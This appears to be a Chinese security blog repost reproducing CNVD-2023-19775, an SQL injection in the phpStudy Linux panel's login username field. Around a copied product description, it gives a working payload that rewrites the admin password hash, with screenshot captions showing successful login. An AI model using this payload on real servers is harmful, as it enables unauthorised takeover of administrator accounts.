CNVD-2023-19775--phpstudy-Linux用户名sql注入复现

admin 2023年3月25日01:11:07评论132 views字数 893阅读2分58秒阅读模式

xiCNVD-2023-19775--phpstudy-Linux用户名sql注入复现

水一段:

phpStudy Linux 面板是什么

phpStudy Linux 面板是由phpStudy官方团队(xp.cn)针对Linux服务器推出的一款服务器环境搭建以及管理工具。

注意:phpStudy 针对Linux服务器集成环境一共推出过两款软件,本软件为 phpStudy Linux 面板,是最近刚刚推出的最新版;另一款是 phpStudy for Linux 2014 版本 是比较老的产品了,具体可参考:https://www.xp.cn/linux.html

phpStudy Linux 面板特色

  • 所有软件免费:phpStudy是一个知名老牌的服务器集成环境工具,我们一直秉承免费公益的理念,帮助广大站长方便、快速的搭建服务器环境。2019年我们新推出的面板继续免费,所有的软件安装全部免费。

  • 可视化快速部署:“让天下没有难配的服务器环境!”这是我们的产品理念,本phpStudy Linux 面板支持可视化安装、搭建WEB服务器环境,包含各种功能配置,非常方便、快捷!

  • 功能齐全:包含安装WEB环境所必须的“LAMP”或者“LNMP”软件,另外包括WEB的配置、安全的配置、监控报表、文件管理、操作日志等,功能还在不断的增加中!

  • 高效运维:通过可视化的web端面板可以轻松部署和管理上百个网站,另外可以时刻监控服务器和网站的运行情况,提升运维效率!

  • 安全稳定、不断更新:网站三天两头的打不开或者被黑等是运维们最头疼的,所以为了确保服务器环境的安全稳定运行,phpStudy团队在不断的更新维护!

漏洞细节建议看视频。

用户名处注入更新密码:

admin';UPDATE ADMINS set PASSWORD = '67f43efc5701784db1504e4993d7e393' where username = 'admin';-- 

正常情况:

CNVD-2023-19775--phpstudy-Linux用户名sql注入复现

注入:

CNVD-2023-19775--phpstudy-Linux用户名sql注入复现

CNVD-2023-19775--phpstudy-Linux用户名sql注入复现

成功登录

CNVD-2023-19775--phpstudy-Linux用户名sql注入复现


参考:https://www.bilibili.com/video/BV1Yc411j7TP

ps:显然,良心dada,建议报名~

原文始发于微信公众号(蓝猫Sec):CNVD-2023-19775--phpstudy-Linux用户名sql注入复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月25日01:11:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CNVD-2023-19775--phpstudy-Linux用户名sql注入复现http://cn-sec.com/archives/1628003.html

发表评论

匿名网友 填写信息